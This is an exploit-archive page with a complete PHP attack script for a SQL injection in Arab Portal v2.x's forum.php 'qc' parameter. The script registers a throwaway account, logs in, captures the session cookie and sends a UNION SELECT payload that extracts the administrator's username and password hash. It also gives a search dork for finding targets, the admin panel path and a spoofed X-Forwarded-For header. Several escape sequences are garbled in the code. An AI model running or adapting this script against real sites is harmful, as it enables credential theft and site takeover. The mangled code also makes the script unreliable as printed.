[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Arab Portal v2.x (forum.php qc) Remote SQL Injection Exploit
# Published : 2009-08-01
# Author : rEcruit
# Previous Title : Payment Processor Script (shop.htm cid) SQL Injection Vulnerability
# Next Title : MAXcms 3.11.20b Multiple Remote File Inclusion Vulnerabilities


<?
 
/*
 
            [  Arab Portal v2.x (forum.php qc) SQL Injection Exploit  ]
            
        [-] Author        : rEcruit
        [-] Mail            : recru1t@ymail.com
        [-] Download   : http://arab-portal.net/download.php
        
        [-] Vuln in  ./forum.php  Line: 1503
        
            [code]
 
                if((isset($apt->get[qc])) &&(!isset($apt->get[qp])))
                {
                   $qc = $apt->get[qc];  
                   $result = $apt->query("select name,comment from rafia_comment where id='$qc'");
                   $row = $apt->dbarray($result);
                   $apt->row['quote'] = "nnn[QUOTE]..... :".$row['name']."n".$row['comment']."[/QUOTE]";
                }
 
            [/code]
 
 
        [-] Debug :
        
            [code]
                $qc = intval($apt->get[qc]);  
            [/code]
 
        [-] Note : Path to Control Panel   "/admin/" .
        
        [-] Condition : magic_quotes_gpc = Off
 
*/
 
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);
 
    function Usage()
    {
            print "nn";
            print "/------------------------------------------------------------\n";
            print "|    Arab Portal v2.x (forum.php qc) SQL Injection Exploit   |n";
            print "------------------------------------------------------------/n";
            print "| [-] Author : rEcruit                                       |n";
            print "| [-] Mail   : recru1t@ymail.com                             |n";
            print "| [-] Greetz : Evil-Cod3r , BlaCK MooN , Fantastic Egypt     |n";
            print "|              ALL Sec-Sni.coM Members                       |n";
            print "------------------------------------------------------------/n";
            print "| [-] Dork     : "Powered by: Arab Portal v2"                |n";
            print "| [+] Usage    : php Exploit.php HOST PATH Options           |n";
            print "| [-] HOST     : Target server (ip/hostname)                 |n";
            print "| [-] PATH     : Path to Arab Portal                         |n";
            print "| [-] Options  :                                             |n";
            print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |n";
            print "------------------------------------------------------------/n";
            print "nn";
 
        exit;
    }
 
    function Send($Packet,$Payload=false)
    {
        Global $host,$proxy;
        
        if(empty($proxy))
        {
            $Connect    = @fsockopen($host,"80") or die("[-] Bad Host .");
        }else{
            $proxy        = explode(":",$proxy);
            $Connect    = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
        }
 
                $Packet    .= "Host : {$host} rn";
                $Packet    .= "X-Forwarded-For: 127.0.0.1rn";
                $Packet    .= "Content-Type: application/x-www-form-urlencodedrn";
                $Packet    .= "Content-Length: ".(strlen($Payload))."rn";
                $Packet    .= "Connection: closernrn";
                $Packet    .= $Payload;
            
                fputs($Connect,$Packet);
 
                while(!feof($Connect))  
                $Response    .= @fgets($Connect,2048);
 
                fclose($Connect);
        
        return $Response;
    }
    
    function SignUp()
    {
    
        GLOBAL $username,$password,$email,$host,$path;
        
            $Payload = "username={$username}&password={$password}&password2={$password}&email={$email}&email2={$email}&homepage=http://&viewemail=0&showemail=1&html_msg=0&usertheme=portal&spam=regnotspam&remain=279&post={$email}&left=279&I1.x=72&I1.y=6";
            $Packet    .= "POST {$path}/members.php?action=insert HTTP/1.1 rn";
            $Packet    .= "Referer: http://{$host}/{$path}/members.php?action=signup rn";
    
        return Send($Packet,$Payload);
    }
    
    function Login_Packet()
    {
    
        GLOBAL $username,$password,$host,$path;
            
            $Payload = "username={$username}&userpass={$password}";
            $Packet    .= "POST {$path}/members.php?action=login HTTP/1.1 rn";
            $Packet    .= "Referer: http://{$host}/{$path}/forum.phprn";
 
        return Send($Packet,$Payload);
    }
 
    function SI_Packet()
    {
    
        GLOBAL $host,$path,$cookie;
            
 
            $Packet    .= "GET {$path}/forum.php?action=addcomment&id=1&qc=-999'+UNION+ALL+SELECT+1,concat(0x313a3a,username,0x3a3a,password,0x3a3a)+FROM+rafia_users+where+userid='1 HTTP/1.1 rn";
            $Packet    .= "Host : {$host} rn";
            $Packet    .= "{$cookie} rn";
            $Packet    .= "Referer: http://{$host}/{$path}/forum.phprn";
            
        return Send($Packet);
    }
    
    function getCookie($Packet)
    {
            $lines    = explode("rn",$Packet);
            for($i = 0; $i < sizeof($lines); $i++)
            {
                $line    = $lines[$i];
                if(ereg("PHPSESSID=",$line))
                {
                    $cookie    = str_replace("Set-Cookie","Cookie",$line);
                    break;
                }
            }
        return $cookie;
    }
 
    
    if ($argc < 3) Usage();
 
    $host    = $argv[1];
    $path    = $argv[2];
    $proxy    = $argv[3];
    
        
        $username    = "user".rand(0,10000);
        $password    = "pwd".rand(0,10000);
        $email        = "email".rand(0,10000)."@yahoo.com";
        
        
        Print "rn[-] Connecting to {$host} .... rnrn";
 
        SignUp();
 
        $cookie    = getCookie(Login_Packet());
 
        $data = split("::",SI_Packet());
        
        Print "[-] Username : $data[1]rn";
        Print "[-] Password : $data[2]rn";
            
 
?>

# www.Syue.com [2009-08-01]